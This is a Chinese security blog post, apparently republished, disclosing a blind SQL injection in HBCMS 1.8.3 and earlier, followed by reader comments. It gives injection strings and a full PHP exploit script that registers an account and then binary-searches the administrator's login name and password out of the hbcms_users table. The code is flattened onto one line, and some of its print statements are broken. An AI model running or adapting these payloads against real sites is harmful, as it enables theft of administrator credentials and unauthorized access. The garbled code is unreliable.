来自http://tunps.com/hbcms-list_resource-php-blind-sql-injection
影响版本:
HBCMS(宏博)<=1.8.3
漏洞描述:
HBCMS是国内比较知名的PHP内容管理系统,尚未开源,源代码使用zend加密。
符合以下三个条件,便可以通过MySQL盲注获得任意敏感信息,比如管理员帐户或者密码:
- 开启用户注册功能
- 开启文件上传功能
- 默认表前缀(hbcms_)
利用方法:
- 注册一个普通会员帐户
- 上传一个图片,图片标题一定要和下面的sql语句相匹配,比如标题填写“b”
- 在搜索栏的标题填写:b%" and (select length(login_name) from hbcms_users where id=1)=5 and "%a%"="%a,如果返回图片,说明为真,如果返回文字:“Nothing here yet! ”,说明为假。
测试用户名长度:b%" and (select length(login_name) from hbcms_users where id=1)=5 and "%a%"="%a
测试密码长度:b%" and (select length(login_pass) from hbcms_users where id=1)=5 and "%a%"="%a
测试用户名内容:b%" and (select mid(login_user,1,1) from hbcms_users where id=1) between char(1) and char(255) and "%a%"="%a
测试密码内容:b%" and (select mid(login_pass,1,1) from hbcms_users where id=1) between char(1) and char(255) and "%a%"="%a
演示录像下载:
因为手动注入很慢,所以写了个程序来辅助注入,但是上传图片的功能调试了N久也没有搞定,只有注册完了后,手动上传了,效率肯定是大大降低。没办法,编程技术有限。
程序的代码如下,如果使用不来,或者不懂得如何利用这个漏洞的同学,请下载动画演示:http://www.rayfile.com/zh-cn/files/c90682f5-7a42-11df-8103-0015c55db73d/
<?php/* options code by tunpishuang[at]gmail.com(tunps.com)*///the list url$expUrl=$argv[1]; //the user info to be registered$regUser='tun';$regPass='tun';$regMail='tun@tunps.com';$regUrl=str_replace('list_resource.php','register.php',$expUrl);// options for image upload$fileDir='@D:\img\b.jpg';$fileTitle='bbbb';$fileDesc='bbbbbbbbbbb';$uploadImgUrl=str_replace('list_resource.php','add_resource.php',$expUrl);/* register function*/if($argc != 3){ echo "usage: php.exe script.php url inj/reg \n"; exit;}if($argv[2] == 'reg'){ reg($regUrl,$regUser,$regPass,$regMail);}//uploadImg($uploadImgUrl,$fileDir,$fileTitle,$fileDesc);if($argv[2] == 'inj'){ inj($expUrl);}function reg($regurl,$u,$p,$m){ $ch = curl_init(); $urlArr=parse_url($regurl); $options=array( CURLOPT_URL=>$regurl, CURLOPT_RETURNTRANSFER=>true, CURLOPT_POST=>true, CURLOPT_POSTFIELDS=>'mod=register_now&next_url=index.php&addon_app=&referrer_id=&login_name='.$u.'&login_pass='.$p.'&confirm_login_pass='.$p.'&login_email='.$m.'&nickname=&gender=0&qq=&mobile=&telephone=&true_name=&website_name=&website_url=&my_question=&my_answer=', CURLOPT_COOKIESESSION=>true, CURLOPT_HEADER=>true, CURLOPT_COOKIEJAR=>'c:\\cookie\\'.$urlArr['host'].'.txt' ); curl_setopt_array($ch,$options); $data = curl_exec($ch); if(strpos($data,'成功')){ printf("register ok <img src="http://tunps.com/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley"> \n"); curl_close($ch); return true; }else{ printf("register failed:(\n"); curl_close($ch); return false; }}/* image uploading function*/function uploadImg($uploadimgurl,$filedir,$filetitle,$filedesc){ $ch = curl_init(); $options=array( CURLOPT_COOKIEFILE=>'c:\cookie.txt', CURLOPT_URL=>$uploadimgurl, CURLOPT_RETURNTRANSFER=>1, CURLOPT_POST=>1, CURLOPT_POSTFIELDS=>http_build_query(array( 'MAX_FILE_SIZE'=>'33554432', 'preview_area_id'=>'upload_file', 'editor_area_id'=>'body', 'js_function'=>'', 'resource_id'=>'', 'show_top_part'=>'no', 'file_1'=>$filedir, 'file_title_1'=>$filetitle, 'file_desc_1'=>$filedesc )) ); curl_setopt_array($ch,$options); $data = curl_exec($ch); if(strpos($data,'注意')){ printf("upload ok ); }else{ printf("upload failed ); } curl_close($ch); }function getLength($expurl,$min,$max,$field){ while($min< $max) { $mid=floor(($min + $max) /2); $leftStr='b%" and (select length('.$field.') from hbcms_users where id=1) between '.$min.' and '.$mid.' and "%a%"="%a'; $rightStr='b%" and (select length('.$field.') from hbcms_users where id=1) between '.$mid.' and '.$max.' and "%a%"="%a'; if(postData($expurl,$leftStr)) { $max=$mid; } if(postData($expurl,$rightStr)) { $min=$mid; } echo "min=".$min."\n"; echo "mid=".$mid."\n"; echo "max=".$max."\n"; } return $mid;}function getStr($expurl,$min,$max,$field,$len){ $str=null; for($i=1;$i<=$len;$i++) { while($min<$max) { $mid=floor(($min+$max)/2); $leftNameStr='b%" and (select mid('.$field.','.$i.',1) from hbcms_users where id=1) between char('.$min.') and char('.$mid.') and "%a%"="%a'; $rightNameStr='b%" and (select mid('.$field.','.$i.',1) from hbcms_users where id=1) between char('.$mid.') and char('.$max.') and "%a%"="%a'; if(postData($expurl,$leftNameStr)) { $max=$mid; } if(postData($expurl,$rightNameStr)) { $min=$mid; } echo "min=".$min."\n"; echo "mid=".$mid."\n"; echo "max=".$max."\n"; } echo chr($mid); $str.=chr($mid); $min=32; $max=126; } return $str;}function inj($expurl){ //ascii code range from 32 to 126 //login_name length range from 2 to 20 //login_pass length range from 5 to 30 $minNameLen=2; $maxNameLen=20; $minPassLen=1; $maxPassLen=33; $minAscii=32; $maxAscii=126; echo 'login name length:'.$nameLen=getLength($expurl,$minNameLen,$maxNameLen,'login_name')."\n"; echo "\n".'login name value :'.$loginValue=getStr($expurl,$minAscii,$maxAscii,'login_name',$nameLen)."\n"; echo 'password length :'.$passLen=getLength($expurl,$minPassLen,$maxPassLen,'login_pass')."\n"; echo "\n".'password value :'.$passValue=getStr($expurl,$minAscii,$maxAscii,'login_pass',$passLen)."\n"; echo "\n".'login name value :'.$loginValue;}function postData($expurl,$sqlstr){ $ch = curl_init(); $urlArr=parse_url($expurl); $options=array( CURLOPT_COOKIEFILE=>'c:\\cookie\\'.$urlArr['host'].'.txt', CURLOPT_URL=>$expurl, CURLOPT_RETURNTRANSFER=>1, CURLOPT_POST=>1, CURLOPT_POSTFIELDS=>http_build_query(array( 'editor_mark'=>'', 'js_function'=>'', 'show_top_part'=>'yes', 'total_file_num'=>'', 'pageID'=>1, 'category_id'=>'all', 'file_type'=>0, 'title'=>$sqlstr )) ); curl_setopt_array($ch,$options); $data = curl_exec($ch); if(strpos($data,'Nothing')) { return false; }else { return true; } curl_close($ch);} |
\n"
\n"厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.hbcms.com/
很明显,这个exp是不可用的!
测试过的,可以用,只是比较鸡肋,利用起来比较困难。
Parse error: syntax error, unexpected ‘=’, expecting ‘)’ in C:\phpnow\php-5.2.14
-Win32\hd.php on line 44
curl_init();这个函数没有啊,麻烦你发你的EXP出来,谢谢。
使用函数curl_init()需要启动php的curl扩展。
方法:修改php.ini 启动
extension=php_curl.dll